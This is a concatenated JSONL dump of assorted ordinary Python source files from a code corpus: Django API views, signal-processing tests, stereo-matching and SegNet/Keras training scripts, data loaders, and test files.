1\n\t\t\txrow[\"reviews\"] = row[\"reviews\"]\n\t\t\txrow[\"desc_snippet\"] = desc_row[\"desc_snippet\"]\n\t\t\tdesc_row = next(desc_mat)\n\t\t\tw.writerow(xrow)\n\t\t\ti += 1\n\t\telse:\n\t\t\ttry:\n\t\t\t\tdesc_row = next(desc_mat)\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\ti += 1\n\t\tprint(\"j:\", j, \"i:\", i)\n\t\t\t\t\n","sub_path":"Y_lang_desc.py","file_name":"Y_lang_desc.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"444517403","text":"# -*- coding: utf-8 -*-\nfrom django.http import JsonResponse\nfrom rest_framework.decorators import api_view\nfrom .Iqra import Iqra\n\n\n@api_view(['POST'])\ndef getSearchResult(request):\n \"\"\"Returns the result of a search. Parameters need to be JSON in the body\n Example: /api/search\n JSON: {\n 'arabicText': u'محمد',\n 'translation': 'en-hilali',\n }\n :param request: REST API request object.\n :type request: rest_framework.request.Request\n :return: JSON response with query text, matches, and suggestions\n :rtype: JsonResponse\n \"\"\"\n data = request.data\n value = data['arabicText']\n if 'translation' in data:\n translation = data['translation']\n else:\n translation = 'en-hilali'\n iqra = Iqra()\n result = iqra.getResult(value, translation)\n result = {'result': result}\n return JsonResponse(result)\n\n\n@api_view(['POST'])\ndef getAyahTranslations(request):\n \"\"\"Returns the translations of an ayah. Parameters need to be JSON in the body\n Example: /api/translations\n JSON: {\n 'ayahs': [Ayahs(surahNum, ayahNum)],\n 'translation': 'en-hilali',\n }\n :param request: REST API request object.\n :type request: rest_framework.request.Request\n :return: JSON response with query text, matches, and suggestions\n :rtype: JsonResponse\n \"\"\"\n data = request.data\n ayahs = data['ayahs']\n if 'translation' in data:\n translation = data['translation']\n else:\n translation = 'en-hilali'\n iqra = Iqra()\n result = iqra.getTranslations(ayahs, translation)\n result = {'result': result}\n return JsonResponse(result)\n","sub_path":"iqra/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"3809630","text":"import unittest\nimport numpy as np\nfrom scipy import signal\n\nimport pycqed.measurement.kernel_functions_ZI as ZI_kf\n\nclass Test_Kernel_functions_ZI(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n self.time_start = -100e-9\n self.time_end = 100e-9\n self.sampling_rate = 2.4e9\n self.time = np.arange(self.time_start, self.time_end, 1/self.sampling_rate)\n self.bounce_delay = 10e-9\n self.bounce_amp = 0.1\n self.sawtooth_period = 50e-9\n\n self.generate_test_waveform(self)\n self.compute_distorted_waveform(self)\n\n def generate_test_waveform(self):\n # Sawtooth test waveform\n self.ideal_waveform = np.remainder(2*self.time/self.sawtooth_period, 1)\n\n def compute_distorted_waveform(self):\n a = ZI_kf.first_order_bounce_kern(self.bounce_delay, self.bounce_amp, self.sampling_rate)\n self.distorted_waveform = signal.lfilter([1.0], a, self.ideal_waveform)\n\n def test_first_order_bounce_correction(self):\n hw_corr = ZI_kf.first_order_bounce_corr(self.distorted_waveform, self.bounce_delay, self.bounce_amp, self.sampling_rate)\n b = ZI_kf.first_order_bounce_kern(self.bounce_delay, ZI_kf.coef_round(self.bounce_amp, force_bshift=0), self.sampling_rate)\n first_order_corr = signal.lfilter(b, 1.0, self.distorted_waveform)\n np.testing.assert_almost_equal(hw_corr, first_order_corr, 6)\n\n def test_ideal_bounce_correction(self):\n # Construct impulse response\n impulse = np.zeros(len(self.time))\n zero_ind = np.argmin(np.abs(self.time))\n impulse[zero_ind] = 1.0\n a = ZI_kf.first_order_bounce_kern(self.bounce_delay, self.bounce_amp, self.sampling_rate)\n impulse_response = signal.lfilter([1.0], a, impulse)\n b_inv = ZI_kf.ideal_inverted_fir_kernel(impulse_response, zero_ind)\n ideal_corr = signal.lfilter(b_inv, 1.0, self.distorted_waveform)\n np.testing.assert_almost_equal(ideal_corr, self.ideal_waveform, 6)\n\n","sub_path":"pycqed/tests/test_kernel_distortions_ZI.py","file_name":"test_kernel_distortions_ZI.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"253010434","text":"#!/usr/bin/env python3\n\nimport sys\n\nimport cv2\nimport numpy as np\n\nimport pysgm\n\ndisp_size = 128\n\nI1 = cv2.imread(sys.argv[1], cv2.IMREAD_GRAYSCALE)\nI2 = cv2.imread(sys.argv[2], cv2.IMREAD_GRAYSCALE)\n\ndisp = np.zeros_like(I2)\n\nI1_ptr, _ = I1.__array_interface__['data']\nI2_ptr, _ = I2.__array_interface__['data']\ndisp_ptr, _ = disp.__array_interface__['data']\n\nheight, width = I1.shape\n\nparams = pysgm.StereoSGM.Parameters(P1=int(10), P2=int(120), uniqueness=np.float32(0.95), subpixel=False,\n PathType=pysgm.PathType.SCAN_8PATH, min_disp=int(0), LR_max_diff=int(1))\n\nsgm = pysgm.StereoSGM(width=width, height=height, disparity_size=int(disp_size), input_depth_bits=int(8),\n output_depth_bits=int(8), inout_type=pysgm.EXECUTE_INOUT.EXECUTE_INOUT_HOST2HOST,\n param=params)\n\nsgm.execute(I1_ptr, I2_ptr, disp_ptr)\n\nmask = disp == np.uint8(sgm.get_invalid_disparity())\ndisp = (255. * disp / disp_size)\n\ndisp_color = cv2.applyColorMap(disp.astype(\"uint8\"), cv2.COLORMAP_JET)\ndisp_color[mask] = 0\n\ncv2.imshow(\"disp_color\", disp_color)\ncv2.waitKey(0)\n","sub_path":"sample/pysgm/pysgm_test_raw.py","file_name":"pysgm_test_raw.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"45319887","text":"import tensorflow as tf\nimport numpy as np\nimport os\nfrom time import time\nfrom data_utils import save_image, load_data, zero_mean_batch, batch_class_weights\nfrom segnet import segnet\nfrom functions import sparse_weighted_cost, sparse_unweighted_cost, pixel_wise_softmax\n\n\ncurrent_dir = os.getcwd()\nnum_classes = 2\nlearning_rate = 1e-3\nepochs = 20\nbatch_size = 8\nnum_batches = 636\nnum_channels = 3\n\n\nX = tf.placeholder(tf.float32, shape=(batch_size, 256, 256, num_channels), name=\"myInput\")\nsparse_label = tf.placeholder(tf.int32, shape=(batch_size, 256, 256), name=\"myOutput\")\nclass_weights = tf.placeholder(tf.float32, shape=(num_classes), name=\"class_weights\")\n\nglobal_step = tf.Variable(0, name='global_step', trainable=False)\n\nlogits = segnet(X, num_classes)\n# unweighted_cost = sparse_unweighted_cost(logits, sparse_label, num_classes)\n# weighted_cost = sparse_weighted_cost(logits, sparse_label, class_weights, num_classes)\n\n\nsumm1 = tf.summary.scalar('unweighted_cost', sparse_unweighted_cost(logits, sparse_label, num_classes))\nsumm2 = tf.summary.scalar('weighted_cost', sparse_weighted_cost(logits, sparse_label, class_weights, num_classes))\n\nlearning_rate_node = tf.train.exponential_decay(\n learning_rate=learning_rate,\n global_step=global_step, decay_steps=1000,\n decay_rate=0.95, staircase=True)\n\noptimizer = tf.train.GradientDescentOptimizer(\n learning_rate=learning_rate_node).minimize(sparse_weighted_cost(logits, sparse_label, class_weights, num_classes))\n\nsumm = tf.summary.merge_all()\n\n\n## some debug help\nprint(X)\nprint(sparse_label)\nprint(logits)\nprint(predicted_image)\nprint(tf.trainable_variables())\n\n## weights to restore should be assigned to a python variable\nwith tf.variable_scope('segnet', reuse=tf.AUTO_REUSE):\n b1 = tf.get_variable(\"conv1/conv1_1/biases\")\n W1 = tf.get_variable(\"conv1/conv1_1/weights\")\n b2 = tf.get_variable(\"conv1/conv1_2/biases\")\n W2 = tf.get_variable(\"conv1/conv1_2/weights\")\n b3 = tf.get_variable(\"conv2/conv2_1/biases\")\n W3 = tf.get_variable(\"conv2/conv2_1/weights\")\n b4 = tf.get_variable(\"conv2/conv2_2/biases\")\n W4 = tf.get_variable(\"conv2/conv2_2/weights\")\n b5 = tf.get_variable(\"conv3/conv3_1/biases\")\n W5 = tf.get_variable(\"conv3/conv3_1/weights\")\n b6 = tf.get_variable(\"conv3/conv3_2/biases\")\n W6 = tf.get_variable(\"conv3/conv3_2/weights\")\n b7 = tf.get_variable(\"conv3/conv3_3/biases\")\n W7 = tf.get_variable(\"conv3/conv3_3/weights\")\n b8 = tf.get_variable(\"conv4/conv4_1/biases\")\n W8 = tf.get_variable(\"conv4/conv4_1/weights\")\n b9 = tf.get_variable(\"conv4/conv4_2/biases\")\n W9 = tf.get_variable(\"conv4/conv4_2/weights\")\n b10 = tf.get_variable(\"conv4/conv4_3/biases\")\n W10 = tf.get_variable(\"conv4/conv4_3/weights\")\n b11 = tf.get_variable(\"conv5/conv5_1/biases\")\n W11 = tf.get_variable(\"conv5/conv5_1/weights\")\n b12 = tf.get_variable(\"conv5/conv5_2/biases\")\n W12 = tf.get_variable(\"conv5/conv5_2/weights\")\n b13 = tf.get_variable(\"conv5/conv5_3/biases\")\n W13 = tf.get_variable(\"conv5/conv5_3/weights\")\n\n\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter('./log/summary/', sess.graph)\n restorer = tf.train.Saver({\"vgg_16/conv1/conv1_1/biases\": b1,\n \"vgg_16/conv1/conv1_1/weights\": W1,\n \"vgg_16/conv1/conv1_2/biases\": b2,\n \"vgg_16/conv1/conv1_2/weights\": W2,\n \"vgg_16/conv2/conv2_1/biases\": b3,\n \"vgg_16/conv2/conv2_1/weights\": W3,\n \"vgg_16/conv2/conv2_2/biases\": b4,\n \"vgg_16/conv2/conv2_2/weights\": W4,\n \"vgg_16/conv3/conv3_1/biases\": b5,\n \"vgg_16/conv3/conv3_1/weights\": W5,\n \"vgg_16/conv3/conv3_2/biases\": b6,\n \"vgg_16/conv3/conv3_2/weights\": W6,\n \"vgg_16/conv3/conv3_3/biases\": b7,\n \"vgg_16/conv3/conv3_3/weights\": W7,\n \"vgg_16/conv4/conv4_1/biases\": b8,\n \"vgg_16/conv4/conv4_1/weights\": W8,\n \"vgg_16/conv4/conv4_2/biases\": b9,\n \"vgg_16/conv4/conv4_2/weights\": W9,\n \"vgg_16/conv4/conv4_3/biases\": b10,\n \"vgg_16/conv4/conv4_3/weights\": W10,\n \"vgg_16/conv5/conv5_1/biases\": b11,\n \"vgg_16/conv5/conv5_1/weights\": W11,\n \"vgg_16/conv5/conv5_2/biases\": b12,\n \"vgg_16/conv5/conv5_2/weights\": W12,\n \"vgg_16/conv5/conv5_3/biases\": b13,\n \"vgg_16/conv5/conv5_3/weights\": W13})\n sess.run(tf.global_variables_initializer())\n restorer.restore(sess, \"./vgg/vgg_16.ckpt\")\n\n saver = tf.train.Saver()\n\n counter = 0\n\n for e in range(epochs):\n start_time = time()\n\n for bn in range(num_batches):\n # Load batch data using data_utils\n x_train, y_train = load_data(\"./d/Carvana\", bn)\n\n # Zero mean the batch\n x_train = x_train/255\n x_train = zero_mean_batch(x_train)\n\n # Check shapes & save images when doing test run\n if bn == 0:\n print(f\"shape of x_train is = {x_train.shape}\")\n print(f\"shape of y_train is = {y_train.shape}\")\n for name_count, image in enumerate(x_train):\n # print(image.shape)\n save_image(image=image, name=f\"image_batch1_{name_count}.png\")\n\n # Calculate class weights in a batch\n c_weights = batch_class_weights(y_train, num_classes)\n\n logit, _ = sess.run([logits, optimizer],\n feed_dict={X: x_train,\n sparse_label: y_train,\n class_weights: c_weights})\n\n summary = sess.run(summ, feed_dict={X: x_train,\n sparse_label: y_train,\n class_weights: c_weights})\n writer.add_summary(summary, counter)\n\n # if bn % 10 == 0:\n # # print(image.shape)\n # save_image(f\"./predicted_images/image_e{e}_bn{bn}_{i}.png\", image)\n\n counter += 1\n\n end_time = time()\n save_path = saver.save(sess, \"./models/model.ckpt\")\n duration = end_time - start_time\n print(f\"epoch no. {e} : done in {duration} sec\")\n\n writer.close()\n","sub_path":"SegNet/segnet_trainbatch.py","file_name":"segnet_trainbatch.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"219802823","text":"\n# coding: utf-8\n\n# https://www.kaggle.com/tilii7/keras-averaging-runs-gini-early-stopping\n\n\nfrom utils import utils, gini\nimport time\nfrom constants import *\nimport os\nimport gc\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import roc_auc_score, log_loss\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom keras.models import load_model, Sequential\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input, Dense, Dropout, Activation, Reshape, Concatenate, Merge\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, Callback, CSVLogger\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.optimizers import SGD\nfrom keras.layers.embeddings import Embedding\n\nfrom tensorflow import set_random_seed\nset_random_seed(88)\n\n\n\nnp.random.seed(88) # for reproducibility\nMODEL_NAME = 'keras_joe'\nSEED = 88\n\ncombined = utils.load_data()\n# combined = utils.bojan_engineer(combined)\n# combined = utils.drop_stupid(combined)\n# combined = utils.engineer_stats(combined)\n# combined = utils.recon_category(combined)\n# combined = utils.cat_transform(combined, 'onehot')\n# combined = utils.data_transform(combined, self.data_transform)\n# combined = utils.feature_interactions(combined)\ntrain, test = utils.recover_train_test_na(combined, fillna=False)\n\n\n# Fillna for minmax scaler\ntrain = train.replace(np.NaN, -1)\ntest = test.replace(np.NaN, -1)\n\nX_train = train.drop('target', axis=1)\ny_train = train.target\nX_test = test\n\ncols_use = [c for c in X_train.columns if (not c.startswith('ps_calc_'))]\n\nX_train = X_train[cols_use]\nX_test = X_test[cols_use]\n\ncol_vals_dict = {c: list(X_train[c].unique()) for c in X_train.columns if c.endswith('_cat')}\n\nembed_cols = []\nfor c in col_vals_dict:\n if len(col_vals_dict[c])>2:\n embed_cols.append(c)\n print(c + ': %d values' % len(col_vals_dict[c])) #look at value counts to know the embedding dimensions\n\nprint('\\n')\n\nclass gini_callback(Callback):\n def __init__(self, training_data, validation_data):\n self.X_tr = training_data[0]\n self.y_tr = training_data[1]\n self.X_val = validation_data[0]\n self.y_val = validation_data[1]\n self.best_lap = 0\n\n def on_train_begin(self, logs={}):\n return\n\n def on_train_end(self, logs={}):\n return\n\n def on_epoch_begin(self, epoch, logs={}):\n return\n\n def on_epoch_end(self, epoch, logs={}):\n y_pred_tr = self.model.predict_proba(self.X_tr)\n logs['gini_tr'] = gini.gini_sklearn(self.y_tr, y_pred_tr)\n y_pred_val = self.model.predict_proba(self.X_val)\n logs['gini_val'] = gini.gini_sklearn(self.y_val, y_pred_val)\n\n # if logs['gini_val'] > self.best_lap:\n # self.best_lap = logs['gini_val']\n\n # global pred_val, pred_test\n # pred_val = y_pred_val\n # pred_test = self.model.predict_proba(X_test)\n\n print('Gini Score in training set: {}, test set: {}'.format(logs['gini_tr'], logs['gini_val']))\n return\n\n def on_batch_begin(self, batch, logs={}):\n return\n\n def on_batch_end(self, batch, logs={}):\n return\n\n\ndef preproc(X_train, X_val, X_test):\n\n input_list_train = []\n input_list_val = []\n input_list_test = []\n\n #the cols to be embedded: rescaling to range [0, # values)\n for c in embed_cols:\n raw_vals = np.unique(X_train[c])\n val_map = {}\n for i in range(len(raw_vals)):\n val_map[raw_vals[i]] = i\n input_list_train.append(X_train[c].map(val_map).values)\n input_list_val.append(X_val[c].map(val_map).fillna(0).values)\n input_list_test.append(X_test[c].map(val_map).fillna(0).values)\n\n #the rest of the columns\n other_cols = [c for c in X_train.columns if (not c in embed_cols)]\n input_list_train.append(X_train[other_cols].values)\n input_list_val.append(X_val[other_cols].values)\n input_list_test.append(X_test[other_cols].values)\n\n return input_list_train, input_list_val, input_list_test\n\n\ndef create_model():\n models = []\n\n model_ps_ind_02_cat = Sequential()\n model_ps_ind_02_cat.add(Embedding(5, 3, input_length=1))\n model_ps_ind_02_cat.add(Reshape(target_shape=(3,)))\n models.append(model_ps_ind_02_cat)\n\n model_ps_ind_04_cat = Sequential()\n model_ps_ind_04_cat.add(Embedding(3, 2, input_length=1))\n model_ps_ind_04_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_ind_04_cat)\n\n model_ps_ind_05_cat = Sequential()\n model_ps_ind_05_cat.add(Embedding(8, 5, input_length=1))\n model_ps_ind_05_cat.add(Reshape(target_shape=(5,)))\n models.append(model_ps_ind_05_cat)\n\n model_ps_car_01_cat = Sequential()\n model_ps_car_01_cat.add(Embedding(13, 7, input_length=1))\n model_ps_car_01_cat.add(Reshape(target_shape=(7,)))\n models.append(model_ps_car_01_cat)\n\n model_ps_car_02_cat = Sequential()\n model_ps_car_02_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_02_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_02_cat)\n\n model_ps_car_03_cat = Sequential()\n model_ps_car_03_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_03_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_03_cat)\n\n model_ps_car_04_cat = Sequential()\n model_ps_car_04_cat.add(Embedding(10, 5, input_length=1))\n model_ps_car_04_cat.add(Reshape(target_shape=(5,)))\n models.append(model_ps_car_04_cat)\n\n model_ps_car_05_cat = Sequential()\n model_ps_car_05_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_05_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_05_cat)\n\n model_ps_car_06_cat = Sequential()\n model_ps_car_06_cat.add(Embedding(18, 8, input_length=1))\n model_ps_car_06_cat.add(Reshape(target_shape=(8,)))\n models.append(model_ps_car_06_cat)\n\n model_ps_car_07_cat = Sequential()\n model_ps_car_07_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_07_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_07_cat)\n\n model_ps_car_09_cat = Sequential()\n model_ps_car_09_cat.add(Embedding(6, 3, input_length=1))\n model_ps_car_09_cat.add(Reshape(target_shape=(3,)))\n models.append(model_ps_car_09_cat)\n\n model_ps_car_10_cat = Sequential()\n model_ps_car_10_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_10_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_10_cat)\n\n model_ps_car_11_cat = Sequential()\n model_ps_car_11_cat.add(Embedding(104, 10, input_length=1))\n model_ps_car_11_cat.add(Reshape(target_shape=(10,)))\n models.append(model_ps_car_11_cat)\n\n model_rest = Sequential()\n model_rest.add(Dense(16, input_dim=24))\n models.append(model_rest)\n\n model = Sequential()\n model.add(Merge(models, mode='concat'))\n model.add(Dense(80))\n model.add(Activation('relu'))\n model.add(Dropout(.35))\n model.add(Dense(20))\n model.add(Activation('relu'))\n model.add(Dropout(.15))\n model.add(Dense(10))\n model.add(Activation('relu'))\n model.add(Dropout(.15))\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n model.compile(loss='binary_crossentropy', optimizer='adam')\n\n return model\n\n\n\n\nepochs = 1024\nbatch_size = 4096\npatience = 10\nKFOLDS = 5\nruns_per_fold =3\n\n\ntmp = time.time()\nskf = StratifiedKFold(n_splits=KFOLDS, random_state=SEED)\nscores = []\noof_train = np.zeros((X_train.shape[0],1))\noof_test = np.zeros((X_test.shape[0],1))\n\n\nfor i, (train_index, val_index) in enumerate(skf.split(X_train, y_train)):\n assert len(X_train) == len(y_train)\n\n score_fold = []\n\n print('\\n')\n\n print('[Fold {}/{} START]'.format(i + 1, KFOLDS))\n\n X_tr, X_val = X_train.iloc[train_index,:], X_train.iloc[val_index,:]\n y_tr, y_val = y_train[train_index], y_train[val_index]\n\n #upsampling adapted from kernel:\n #https://www.kaggle.com/ogrellier/xgb-classifier-upsampling-lb-0-283\n pos = (pd.Series(y_tr == 1))\n\n # Add positive examples\n X_tr = pd.concat([X_tr, X_tr.loc[pos]], axis=0)\n y_tr = pd.concat([y_tr, y_tr.loc[pos]], axis=0)\n\n # Shuffle data\n idx = np.arange(len(X_tr))\n np.random.shuffle(idx)\n X_tr = X_tr.iloc[idx]\n y_tr = y_tr.iloc[idx]\n\n #preprocessing\n X_tr, X_val, X_test = preproc(X_tr, X_val, test)\n\n for j in range(runs_per_fold):\n print('Starting run {}'.format(j+1))\n\n pred_val = np.zeros((len(val_index),1))\n pred_test = np.zeros((892816,1))\n log_path = os.path.join(LOG_PATH, MODEL_NAME + '_log.csv')\n checkpoint_path = os.path.join(LOG_PATH, MODEL_NAME + '_check.check'.format(j))\n\n callbacks = [\n gini_callback(training_data=(X_tr, y_tr), validation_data=(X_val, y_val)),\n EarlyStopping(monitor='gini_val', patience=patience, mode='max', verbose=1),\n CSVLogger(log_path, separator=',', append=False),\n ModelCheckpoint(checkpoint_path, monitor='gini_val', mode='max', save_best_only=True, save_weights_only=True, verbose=1)\n ]\n\n model = create_model()\n\n\n model.fit(X_tr, y_tr, shuffle=False, batch_size=batch_size, epochs=epochs, verbose=99, callbacks=callbacks)\n\n # delete current model\n del model\n\n # load best model of each run\n model = create_model()\n model.load_weights(checkpoint_path, by_name=False)\n\n # For train and valid only\n pred_val = model.predict_proba(X_val)\n oof_train[val_index] += pred_val / runs_per_fold\n\n # Store average score for evaluate model\n score_fold.append(gini.gini_sklearn(y_val, pred_val))\n\n print('Run {}: {}'.format(j+1, score_fold[j]))\n\n pred_test_lap = model.predict_proba(X_test)\n pred_test += pred_test_lap / runs_per_fold\n\n # Store test predictions for submissions\n\n oof_test += pred_test / KFOLDS\n\n scores.append(np.mean(score_fold))\n print('[Fold {}/{} Gini score: {}]'.format(i+1, KFOLDS, scores[i]))\n\n gc.collect()\n print('[Fold {}/{} END]'.format(i+1, KFOLDS))\n\nprint('Average score: {}'.format(np.mean(scores)))\nprint('Total run time: {} seconds'.format(time.time() - tmp))\n\n# Export oof_train\nfile_path = os.path.join(OOF_PATH, MODEL_NAME + '_train.csv')\npd.DataFrame({MODEL_NAME: oof_train.reshape(-1, )}).to_csv(file_path, index=False)\n# np.savetxt(file_path, oof_train.reshape(-1, 1), delimiter=',', fmt='%.5f')\n\n# Export oof_test\nfile_path = os.path.join(OOF_PATH, MODEL_NAME + '_test.csv')\npd.DataFrame({MODEL_NAME: oof_test.reshape(-1, )}).to_csv(file_path, index=False)\n# np.savetxt(file_path, oof_test.reshape(-1, 1), delimiter=',', fmt='%.5f')\nprint('SUCCESSFULLY SAVE {} AT {} PLEASE VERIFY THEM'.format(MODEL_NAME, OOF_PATH))\n","sub_path":"models/keras_joe.py","file_name":"keras_joe.py","file_ext":"py","file_size_in_byte":10747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"414062647","text":"\"\"\"Preprocess csv-formatted text dataset.\"\"\"\nimport csv\n\nimport h5py\nimport numpy as np\n\n\nclass DatasetLoader:\n def __init__(self, sequence_max_length=1024):\n self.alphabet = (\n 'abcdefghijklmnopqrstuvwxyz0123456789-,;.!?:’\"/|_#$%ˆ&*˜‘+=<>()[]{} '\n )\n self.char_dict = {}\n self.sequence_max_length = sequence_max_length\n for i, c in enumerate(self.alphabet):\n self.char_dict[c] = i + 1\n\n def char2vec(self, text):\n data = np.zeros(self.sequence_max_length)\n text = text[:self.sequence_max_length]\n for i in range(0, len(text)):\n if i > self.sequence_max_length:\n return data\n elif text[i] in self.char_dict:\n data[i] = self.char_dict[text[i]]\n else:\n # unknown character set to be 68\n data[i] = 68\n return data\n\n @staticmethod\n def load_h5_dataset(dataset_path):\n h5f = h5py.File(dataset_path + \"train.h5\", \"r\")\n train_data = h5f[\"train_x\"][:]\n train_label = h5f[\"train_y\"][:]\n h5f.close()\n\n h5f = h5py.File(dataset_path + \"test.h5\", \"r\")\n test_data = h5f[\"test_x\"][:]\n test_label = h5f[\"test_y\"][:]\n h5f.close()\n return train_data, train_label, test_data, test_label\n\n def load_csv_file(self, filename, num_classes):\n \"\"\"Load CSV file, generate one-hot labels and process text data as Paper did.\"\"\"\n all_data = []\n labels = []\n with open(filename) as f:\n reader = csv.DictReader(f, fieldnames=[\"class\"], restkey=\"fields\")\n for row in reader:\n # One-hot\n one_hot = np.zeros(num_classes)\n one_hot[int(row[\"class\"]) - 1] = 1\n labels.append(one_hot)\n # Char2vec\n text = row[\"fields\"][-1].lower()\n all_data.append(self.char2vec(text))\n return np.array(all_data), np.array(labels)\n\n def load_dataset(self, dataset_path, dataset_type=\"text\"):\n # Read Classes Info\n with open(dataset_path + \"classes.txt\") as f:\n classes = []\n for line in f:\n classes.append(line.strip())\n num_classes = len(classes)\n\n if dataset_type == \"embeddings\":\n train_data, train_label, test_data, test_label = self.load_h5_dataset(\n dataset_path\n )\n elif dataset_type == \"text\":\n train_data, train_label = self.load_csv_file(\n dataset_path + \"train.csv\", num_classes\n )\n test_data, test_label = self.load_csv_file(\n dataset_path + \"test.csv\", num_classes\n )\n else:\n raise Exception(\"Dataset type '{}' is unknown.\".format(dataset_type))\n\n return train_data, train_label, test_data, test_label\n\n @staticmethod\n def batch_iter(data, batch_size, num_epochs, shuffle=True):\n \"\"\"Generates a batch iterator for a dataset.\"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"148142913","text":"from tools.status import *\nimport time\ndef f_reader(filename):\n print_status(\"reading from file \\33[94m{}\\33[00m\\n\".format(filename))\n time.sleep(3)\n try:\n with open(filename, 'r') as f:\n contents = f.read()\n print(contents)\n except:\n print_error('unable to locate file')\n ","sub_path":"tools/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"412023744","text":"import numpy as np\nimport pytest\nfrom sybric.data import TimeSeriesVitalSigns\n\n\ndataset = TimeSeriesVitalSigns()\n\ndef test_TimeSeriesVitalSigns_inv_transforms():\n d = dataset\n X = d.X.astype(np.float128)\n y = d.y\n s = d.synthesis_df(X, y)\n assert np.isclose(d.inv_whiten(d.whiten(X)), X).all()\n assert np.isclose(d.inv_normalize(d.normalize(X)), X).all()\n assert np.isclose(d.inv_minmax(d.minmax(X)), X).all()\n assert np.isclose(d.inv_minmax_signals(d.minmax_signals(X)), X).all()\n\n columns = ['cat_vital_sign', 't', 'class']\n assert (s[columns] == d.df[columns]).all().all()\n assert np.isclose(s['value'], d.df['value']).all()\n\ndef test_TimeSeriesVitalSigns_transform_minmax():\n X = np.array([\n # patient 1 \n [[36, 90], [40, 100], [40, 100]],\n # patient 2 \n [[40, 80], [36, 90], [36, 90]],\n # patient 3 \n [[40, 80], [36, 90], [36, 90]]\n ])\n\n e = np.array([\n # patient 1 \n [[-1, 1], [1, 1], [1, 1]],\n # patient 2\n [[1, -1], [-1, -1], [-1, -1]],\n # patient 3\n [[1, -1], [-1, -1], [-1, -1]]\n ])\n\n assert (dataset.minmax(X, X) == e).all()\n assert X.shape == (3, 3, 2)\n\ndef test_TimeSeriesVitalSigns_transform_minmax_signals():\n X = np.array([\n # patient 1\n [[36, 90], [40, 100], [40, 100]],\n # patient 2\n [[40, 80], [36, 90], [36, 90]],\n # patient 2\n [[40, 80], [36, 90], [36, 90]],\n # patient 2\n [[40, 80], [36, 90], [36, 90]],\n ])\n\n # signal 1 = [36, 40, 40, 36] -> [-1, 1, 1, -1]\n # signal 2 = [90, 100, 80, 90] -> [ 0, 1, -1, 0]\n\n e = np.array([\n # patient 1\n [[-1, 0], [1, 1], [1, 1]],\n # patient 2\n [[1, -1], [-1, 0], [-1, 0]],\n # patient 2\n [[1, -1], [-1, 0], [-1, 0]],\n # patient 2\n [[1, -1], [-1, 0], [-1, 0]]\n ])\n\n assert (dataset.minmax_signals(X, X) == e).all()\n assert X.shape == (4, 3, 2)\n assert e.shape == (4, 3, 2)\n","sub_path":"tests/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"224288806","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c), 2016-2018, SISSA (International School for Advanced Studies).\n# All rights reserved.\n# This file is distributed under the terms of the MIT License.\n# See the file 'LICENSE' in the root directory of the present\n# distribution, or http://opensource.org/licenses/MIT.\n#\n# @author Davide Brunato \n#\n\"\"\"\nThis module runs tests concerning resources.\n\"\"\"\nimport unittest\nimport os\nimport sys\n\ntry:\n import xmlschema\nexcept ImportError:\n # Adds the package base dir path as first search path for imports\n pkg_base_dir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n sys.path.insert(0, pkg_base_dir)\n import xmlschema\n\n\nclass TestResources(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.test_dir = os.path.dirname(__file__)\n cls.xs1 = xmlschema.XMLSchema(os.path.join(cls.test_dir, \"examples/vehicles/vehicles.xsd\"))\n cls.xs2 = xmlschema.XMLSchema(os.path.join(cls.test_dir, \"examples/collection/collection.xsd\"))\n cls.cars = cls.xs1.elements['vehicles'].type.content_type[0]\n cls.bikes = 